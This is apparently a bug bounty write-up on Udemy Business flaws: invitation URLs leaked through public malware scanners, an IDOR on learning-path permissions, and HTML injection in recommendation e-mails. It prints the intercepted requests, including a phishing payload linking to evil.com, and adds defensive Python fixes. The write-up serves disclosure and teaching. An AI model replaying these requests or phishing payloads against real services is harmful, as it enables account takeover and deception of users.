From URL dump digging to IDOR, BAC, and Massive Phishing in Udemy

Broken Access Control — Udemy

The URLs were invitations for business accounts belonging to many companies that use Udemy for Business. These invitations kept leaking from time to time through public malware scanners, because users at those companies were submitting the invitation URLs to the scanners to check them for malware.
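The root cause here is that a bare invitation URL was a bearer credential: anyone who saw it (including a public scanner) could claim the seat. As an added example, not Udemy's code, here is how an invitation-redeem endpoint can be designed so that a leaked URL alone is not enough. The store, model and function names are hypothetical; the token is kept only as a hash, expires, is single-use, and must be redeemed by a logged-in account whose e-mail matches the invited address.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Invitation:
    token_hash: str      # only a SHA-256 of the token is stored; a DB leak yields no usable URLs
    invited_email: str   # the invitation is bound to one address
    org_id: int
    expires_at: float
    redeemed: bool = False


# Hypothetical in-memory store standing in for the invitation table.
INVITATIONS: Dict[str, Invitation] = {}


def _hash_token(token: str) -> str:
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


def create_invitation(invited_email: str, org_id: int,
                      ttl_seconds: int = 7 * 24 * 3600,
                      now: Optional[float] = None) -> str:
    """Issue an invitation and return the secret token that goes into the e-mailed URL."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)           # 256 bits of entropy: not guessable or enumerable
    inv = Invitation(_hash_token(token), invited_email.lower(), org_id, now + ttl_seconds)
    INVITATIONS[inv.token_hash] = inv
    return token


def redeem_invitation(token: str, authenticated_email: str,
                      now: Optional[float] = None) -> int:
    """Redeem a token for the logged-in user and return the org_id on success.

    Every failure raises PermissionError so the caller returns one generic 403 and
    does not tell whoever holds a scanned URL why it was rejected.
    """
    now = time.time() if now is None else now
    inv = INVITATIONS.get(_hash_token(token))
    if inv is None:
        raise PermissionError("unknown invitation")
    if inv.redeemed:
        raise PermissionError("invitation already redeemed")
    if now > inv.expires_at:
        raise PermissionError("invitation expired")
    # Constant-time comparison of the invited address with the authenticated account.
    if not hmac.compare_digest(inv.invited_email.encode("utf-8"),
                               authenticated_email.lower().encode("utf-8")):
        raise PermissionError("invitation was issued to a different account")
    inv.redeemed = True                         # single use: a scanner replaying the URL later gets nothing
    return inv.org_id


if __name__ == "__main__":
    t = create_invitation("alice@example.com", org_id=42, now=1000.0)
    print(redeem_invitation(t, "alice@example.com", now=2000.0))
```

With this design the URL that ends up in a scanner's public history is useless on its own: it expires, it can be consumed only once, and it only works for the account it was addressed to.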

Invitation Redeem

Information Disclosure — Udemy

Udemy Business trial accounts did not expose all business functions or API endpoints, so I decided to claim one of the leaked invitation tokens to test all possible functionalities, and I found a Learning Paths feature.

Disclosing Organizations Learning Paths

I opened Burp and intercepted requests to *.udemy.com/learningpaths, and I got:

GET /api-2.0/learning-paths/?page=1&page_size=20&fields[learning_path]=@default,is_user_enrolled,estimated_content_length,num_enrollments,folder_ids,is_owner_in_group&list_type=all&ordering=-created HTTP/1.1
Host: █████.udemy.com

HTTP/1.1 200 OK

{"count":30,"next":"█████","previous":null,"results":[{"_class":"learning_path","id":█████504,"title":"Ethical Hacking","description":"Path to becoming Ethical Hacker. Learning journey would include Web app hacking, N/W hacking, AD hacking, Privilege escalation and much more.","owner":{"_class":"user","id":█████6538,"display_name":"█████S","image_50x50":"*","initials":"SP"},"is_public":true,"editors":[{"_class":"user","id":█████6538,"display_name":"█████S","image_50x50":"█████","initials":"SP"}],"is_user_enrolled":false,"estimated_content_length":3172,"num_enrollments":2,"folder_ids":[],"is_owner_in_group":false}, ...]}

Disclosing Trial Organizations Status

GET /api-2.0/organization-trial/status/ HTTP/1.1
Host: █████.udemy.com

HTTP/1.1 200 OK

{"available_count": 5, "active_remaining_days": 0, "owner_email": "█████", "trial_limit_reached": false, "used_count": 0, "owner_name": "█████", "is_owner": false, "remaining_seats": 0}

Insecure Direct Object Reference — Udemy

During my testing I noticed that a request is sent to

PUT /api-2.0/learning-paths/█████886/permissions/ HTTP/1.1
Host: █████.udemy.com

{"added_editors_ids":[],"removed_editors_ids":[]}

The same request sent against a different learning path ID, with my own user ID (152495920) in added_editors_ids:

PUT /api-2.0/learning-paths/█████514/permissions/ HTTP/1.1
Host: █████.udemy.com

{"added_editors_ids":[152495920],"removed_editors_ids":[]}

HTTP/1.1 200 OK

{"results":[{"_class":"user","id":█████034,"display_name":"█████vschi","image_50x50":"█████","initials":"AP"},{"_class":"user","id":152495920,"display_name":"Mostafa Mamdoh","image_50x50":"█████","initials":"MM"}]}
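The learning-path listing, the trial-status endpoint and this permissions update all lack the same two server-side checks: that the object belongs to the caller's organization, and that the caller actually holds a role on it. As an added example, not Udemy's code, here is an authorization layer for those operations with both checks in place; the models, the in-memory store and the function names are hypothetical. It replays the scenario from this section: a user from a trial organization trying to add their own ID as an editor of another organization's learning path.

```python
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Set


@dataclass
class User:
    id: int
    org_id: int


@dataclass
class LearningPath:
    id: int
    org_id: int
    owner_id: int
    editor_ids: Set[int] = field(default_factory=set)
    is_public: bool = False


# Constructed sample data: two tenants, all IDs made up.
USERS: Dict[int, User] = {
    1001: User(1001, org_id=1),   # owner of path 500 in org 1
    1002: User(1002, org_id=1),   # colleague in org 1
    2001: User(2001, org_id=2),   # user of a trial organization (the attacker's position in the post)
}
PATHS: Dict[int, LearningPath] = {
    500: LearningPath(500, org_id=1, owner_id=1001, is_public=True),
    501: LearningPath(501, org_id=1, owner_id=1002, is_public=False),
    900: LearningPath(900, org_id=2, owner_id=2001, is_public=True),
}


def can_manage(user: User, path: LearningPath) -> bool:
    """Only the owner or an existing editor may manage a path, and only inside the same tenant."""
    return path.org_id == user.org_id and (user.id == path.owner_id or user.id in path.editor_ids)


def list_learning_paths(user: User) -> List[int]:
    """GET /learning-paths/: tenant-scoped first, then a visibility rule within the tenant."""
    return sorted(p.id for p in PATHS.values()
                  if p.org_id == user.org_id and (p.is_public or can_manage(user, p)))


def update_permissions(user: User, path_id: int,
                       added: Iterable[int], removed: Iterable[int]) -> List[int]:
    """PUT /learning-paths/<id>/permissions/ with authorization done before any write."""
    path = PATHS.get(path_id)
    # A cross-tenant ID is handled exactly like a non-existent one (404), so the
    # response does not confirm that another organization's path exists.
    if path is None or path.org_id != user.org_id:
        raise LookupError("learning path not found")
    if not can_manage(user, path):
        raise PermissionError("not an owner or editor of this learning path")
    added, removed = set(added), set(removed)
    # Editors must already be members of the path's organization.
    for uid in added:
        target = USERS.get(uid)
        if target is None or target.org_id != path.org_id:
            raise ValueError(f"user {uid} is not a member of this organization")
    if path.owner_id in removed:
        raise ValueError("the owner cannot be removed from their own path")
    path.editor_ids |= added
    path.editor_ids -= removed
    return sorted(path.editor_ids)


if __name__ == "__main__":
    attacker = USERS[2001]
    print(list_learning_paths(attacker))              # only org 2's path is visible
    try:
        update_permissions(attacker, 500, added=[2001], removed=[])
    except LookupError as e:
        print("blocked:", e)
```

The ordering matters: the tenant check runs before the role check, and both run before any membership lookup or write, so an unauthorized caller never learns anything about the object beyond "not found".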

Possible Massive Phishing Attack Through Html Injection

I spotted a course-recommendation feature designed specifically for members of the same organization. I used Burp and captured this request:

POST /api-2.0/share/course/█████/recommend/ HTTP/1.1

-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████388
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████382
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████580
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████083
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████288
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████988
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="message"
<h1>Hey █████</h1>Please go to https://evil.com/accept to redeem your invite <img src="https://pbs.twimg.com/profile_images/810954665202434052/_m3mPbHa_400x400.jpg" alt="Smiley face" width="42" height="42" style="vertical-align:bottom">
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="context"
ufb_clp
-----------------------------374017102511920071852193229569--
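The message field is placed into the recommendation e-mail as raw HTML, which is what turns a recommendation into a phishing mail delivered from a trusted sender. As an added example, not Udemy's code, here is the vulnerable rendering beside a hardened one that escapes the field, plus a server-side policy check that rejects markup and off-platform links at the API boundary before any mail is built. The template, the sample payload and its placeholder host are constructed for the example.

```python
import html
import re
from typing import Tuple

# Constructed sample payload of the kind shown above (the host is a placeholder).
SAMPLE_MESSAGE = ('<h1>Hey Alice</h1>Please go to https://evil.example/accept to redeem your invite '
                  '<img src="https://evil.example/logo.jpg" alt="logo" width="42" height="42">')

# Hypothetical e-mail body template.
EMAIL_TEMPLATE = ('<p>{sender} recommends the course <b>{course}</b>:</p>'
                  '<blockquote>{message}</blockquote>')

TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
URL_RE = re.compile(r"(?:https?:)?//|www\.", re.IGNORECASE)


def render_vulnerable(sender: str, course: str, message: str) -> str:
    """User input goes straight into the HTML body: tags in `message` become live markup."""
    return EMAIL_TEMPLATE.format(sender=sender, course=course, message=message)


def render_safe(sender: str, course: str, message: str) -> str:
    """Every interpolated field is HTML-escaped, so the message is shown as literal text."""
    return EMAIL_TEMPLATE.format(sender=html.escape(sender, quote=True),
                                 course=html.escape(course, quote=True),
                                 message=html.escape(message, quote=True))


def validate_message(message: str, max_len: int = 500) -> Tuple[bool, str]:
    """Input policy for a free-text recommendation note: plain text, no markup, no links.

    Escaping at render time is the primary control; this check additionally stops
    the abuse case (a link to an external site) before the request is accepted.
    """
    if len(message) > max_len:
        return False, "message too long"
    if TAG_RE.search(message):
        return False, "markup is not allowed"
    if URL_RE.search(message):
        return False, "links are not allowed"
    return True, "ok"


def has_live_markup(rendered: str) -> bool:
    """Review helper: does a rendered body still contain injected elements?"""
    return re.search(r"<(h1|img|a|script|form)\b", rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    print(has_live_markup(render_vulnerable("Bob", "Ethical Hacking", SAMPLE_MESSAGE)))
    print(has_live_markup(render_safe("Bob", "Ethical Hacking", SAMPLE_MESSAGE)))
    print(validate_message(SAMPLE_MESSAGE))
```

Escaping on output is what removes the injection; the input policy is defence in depth that also closes the phishing angle for a field that never needs to carry links, and `has_live_markup` is the kind of assertion a regression test for the mail template should carry.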
  • March 3, 2021 — Vulnerabilities reported.
  • April 7, 2021 — Total bounties awarded: $1300.
  • August 7, 2021 — Reports resolved.

  • Use public URL archives or scanners to recon for private instances or leaked tokens belonging to sensitive features. Use https://osintframework.com/
  • Try to elevate the impact of your content injections by chaining them with phishing scenarios.

Mostafa Mamdoh

I’m a Penetration Tester, Bug Hunter @ HackerOne